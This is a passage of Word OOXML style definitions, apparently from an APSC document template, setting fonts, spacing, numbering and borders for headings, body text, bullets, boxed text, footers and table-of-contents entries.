    <w:aliases w:val="APSC Chapter Heading"/>
    <w:next w:val="BodyText"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="009354DC"/>
    <w:pPr>
      <w:keepNext/>
      <w:pageBreakBefore/>
      <w:spacing w:before="360" w:after="120"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Batang" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:aliases w:val="APSC Heading 1"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:qFormat/>
    <w:rsid w:val="00E50153"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="360" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:aliases w:val="APSC Heading 2"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="00E50153"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="360" w:after="120"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:aliases w:val="APSC Heading 3"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0091561C"/>
    <w:pPr>
      <w:spacing w:before="360" w:after="120"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Batang" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:aliases w:val="APSC Heading 4"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0091561C"/>
    <w:pPr>
      <w:spacing w:before="360" w:after="120"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Batang" w:hAnsi="Arial" w:cs="Arial"/>
      <w:bCs/>
      <w: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PSC Body text"/>
    <w:next w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:rsid w:val="007B643F"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:aliases w:val="APSC Body text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:rsid w:val="007B643F"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:aliases w:val="APSC Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:rsid w:val="0091561C"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Batang" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBoldtext">
    <w:name w:val="APSC Bold text"/>
    <w:basedOn w:val="BodyText"/>
    <w:next w:val="BodyText"/>
    <w:link w:val="APSCBoldtextChar"/>
    <w:qFormat/>
    <w:rsid w:val="004C499B"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="APSCNumberedtext">
    <w:name w:val="APSC Numbered text"/>
    <w:basedOn w:val="NoList"/>
    <w:rsid w:val="0004441B"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBlocktext">
    <w:name w:val="APSC Block text"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00A72D75"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="180"/>
      <w:ind w:left="454" w:right="454"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:iCs/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="006A6B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aliases w:val="APSC Footnote Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005C0429"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCtabletextcentred">
    <w:name w:val="APSC table text centred"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00EE7CF1"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCPagenumber">
    <w:name w:val="APSC Page number"/>
    <w:qFormat/>
    <w:rsid w:val="00CB5BC5"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
      </w:pBdr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Calibri"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:aliases w:val="APSC Footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00954A0A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:aliases w:val="APSC Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00954A0A"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBoxedbodytext">
    <w:name w:val="APSC Boxed body text"/>
    <w:qFormat/>
    <w:rsid w:val="00197D4B"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="8" w:space="6" w:color="FFFFFF" w:themeColor="background1"/>
        <w:left w:val="single" w:sz="8" w:space="22" w:color="FFFFFF" w:themeColor="background1"/>
        <w:bottom w:val="single" w:sz="8" w:space="10" w:color="FFFFFF" w:themeColor="background1"/>
        <w:right w:val="single" w:sz="8" w:space="22" w:color="FFFFFF" w:themeColor="background1"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
      <w:spacing w:after="120"/>
      <w:ind w:left="454" w:right="454"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Tahoma"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCTableordiagramheading">
    <w:name w:val="APSC Table or diagram heading"/>
    <w:qFormat/>
    <w:rsid w:val="001E523E"/>
    <w:pPr>
      <w:spacing w:before="360" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Batang" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="FootnoteText">
    <w:name w:val="footnote text"/>
    <w:aliases w:val="APSC Footnotes"/>
    <w:link w:val="FootnoteTextChar"/>
    <w:rsid w:val="00757E1A"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Calibri"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FootnoteTextChar">
    <w:name w:val="Footnote Text Char"/>
    <w:aliases w:val="APSC Footnotes Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="FootnoteText"/>
    <w:rsid w:val="00757E1A"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Calibri"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCphotocaption">
    <w:name w:val="APSC photo caption"/>
    <w:rsid w:val="00E2772D"/>
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Calibri"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCtablecolumnheadingscentred">
    <w:name w:val="APSC table column headings centred"/>
    <w:basedOn w:val="APSCtabletextcentred"/>
    <w:rsid w:val="00EE7CF1"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:aliases w:val="APSC Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:rsid w:val="0091561C"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Batang" w:hAnsi="Arial" w:cs="Arial"/>
      <w:bCs/>
      <w:i/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:rsid w:val="00DA4895"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:rsid w:val="00DA4895"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCItalicisedtext">
    <w:name w:val="APSC Italicised text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="APSCItalicisedtextChar"/>
    <w:rsid w:val="00DA4895"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="APSCItalicisedtextChar">
    <w:name w:val="APSC Italicised text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="APSCItalicisedtext"/>
    <w:rsid w:val="00DA4895"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Calibri"/>
      <w:i/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="Style1">
    <w:name w:val="Style 1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00366246"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="APSCBoldtextChar">
    <w:name w:val="APSC Bold text Char"/>
    <w:basedOn w:val="BodyTextChar"/>
    <w:link w:val="APSCBoldtext"/>
    <w:rsid w:val="00017369"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Calibri"/>
      <w:b/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBullet-Level1">
    <w:name w:val="APSC Bullet - Level 1"/>
    <w:qFormat/>
    <w:rsid w:val="00292AB2"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="12"/>
      </w:numPr>
      <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBullet-Level3">
    <w:name w:val="APSC Bullet - Level 3"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00292AB2"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="13"/>
      </w:numPr>
      <w:ind w:left="851" w:hanging="284"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBullet-Level4">
    <w:name w:val="APSC Bullet - Level 4"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00292AB2"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="14"/>
      </w:numPr>
      <w:ind w:left="1134" w:hanging="284"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBullet-Level5">
    <w:name w:val="APSC Bullet - Level 5"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00292AB2"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="15"/>
      </w:numPr>
      <w:ind w:left="1418" w:hanging="284"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBullet-Level2">
    <w:name w:val="APSC Bullet - Level 2"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00292AB2"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="26"/>
      </w:numPr>
      <w:ind w:left="567" w:hanging="283"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCNumbered-Level1">
    <w:name w:val="APSC Numbered - Level 1"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00885A58"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCNumbered-Level2">
    <w:name w:val="APSC Numbered - Level 2"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00885A58"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="27"/>
      </w:numPr>
      <w:ind w:left="568" w:hanging="284"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="APSCBoxedbold">
    <w:name w:val="APSC Boxed bold"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00013288"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBoxedbullet1">
    <w:name w:val="APSC Boxed bullet 1"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00013288"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="28"/>
      </w:numPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="8" w:space="6" w:color="FFFFFF" w:themeColor="background1"/>
        <w:left w:val="single" w:sz="8" w:space="22" w:color="FFFFFF" w:themeColor="background1"/>
        <w:bottom w:val="single" w:sz="8" w:space="10" w:color="FFFFFF" w:themeColor="background1"/>
        <w:right w:val="single" w:sz="8" w:space="22" w:color="FFFFFF" w:themeColor="background1"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:right="454"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Tahoma"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBoxedbullet2">
    <w:name w:val="APSC Boxed bullet 2"/>
    <w:basedOn w:val="APSCBoxedbullet1"/>
    <w:rsid w:val="00013288"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="29"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBoxedheading1">
    <w:name w:val="APSC Boxed heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="00013288"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="8" w:space="6" w:color="FFFFFF" w:themeColor="background1"/>
        <w:left w:val="single" w:sz="8" w:space="22" w:color="FFFFFF" w:themeColor="background1"/>
        <w:bottom w:val="single" w:sz="8" w:space="10" w:color="FFFFFF" w:themeColor="background1"/>
        <w:right w:val="single" w:sz="8" w:space="22" w:color="FFFFFF" w:themeColor="background1"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
      <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="454" w:right="454"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Tahoma"/>
      <w:b/>
      <w:sz w:val="26"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBoxedheading2">
    <w:name w:val="APSC Boxed heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="00013288"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="8" w:space="6" w:color="FFFFFF" w:themeColor="background1"/>
        <w:left w:val="single" w:sz="8" w:space="22" w:color="FFFFFF" w:themeColor="background1"/>
        <w:bottom w:val="single" w:sz="8" w:space="10" w:color="FFFFFF" w:themeColor="background1"/>
        <w:right w:val="single" w:sz="8" w:space="22" w:color="FFFFFF" w:themeColor="background1"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
      <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="454" w:right="454"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Tahoma"/>
      <w:b/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="APSCBoxeditalics">
    <w:name w:val="APSC Boxed italics"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00013288"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:color w:val="auto"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:qFormat/>
    <w:rsid w:val="000F05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F05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0F05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F0534"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBulletedtext">
    <w:name w:val="APSC Bulleted text"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00F22F00"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="31"/>
      </w:numPr>
      <w:ind w:left="227" w:hanging="227"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="APSCBoxedtext">
    <w:name w:val="APSC Boxed text"/>
    <w:qFormat/>
    <w:rsid w:val="00F22F00"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="8" w:space="6" w:color="FFFFFF" w:themeColor="background1"/>
        <w:left w:val="single" w:sz="8" w:space="22" w:color="FFFFFF" w:themeColor="background1"/>
        <w:bottom w:val="single" w:sz="8" w:space="10" w:color="FFFFFF" w:themeColor="background1"/>
        <w:right w:val="single" w:sz="8" w:space="22" w:color="FFFFFF" w:themeColor="background1"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
      <w:spacing w:after="120"/>
      <w:ind w:left="454" w:right="454"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Tahoma"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:rsid w:val="00F22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22F00"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="006137AB"/>
    <w:pPr>
      <w:keepLines/>
      <w:pageBreakBefore w:val="0"/>
      <w:spacing w:before="480"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2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="006137AB"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="006137AB"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006137AB"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="00352B84"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
      </w:tabs>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C40E84"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00920F4A"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Body1">
    <w:name w:val="Body 1"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00FB0200"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Arial Unicode MS" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:u w:color="000000"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ImportWordListStyleDefinition-119">
    <w:name w:val="Import Word List Style Definition -119"/>
    <w:rsid w:val="009B132C"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="36"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002817E4"/>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992847"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:aliases w:val="APSC Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:rsid w:val="00BC7526"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableList3">
    <w:name w:val="Table List 3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="00FC4CE2"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="30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Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:aliases w:val="APSC Chapter Heading Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="0077253D"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Batang" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>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heading 1" w:uiPriority="9"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0934DC"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:aliases w:val="APSC Chapter Heading"/>
    <w:next w:val="BodyText"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="009354DC"/>
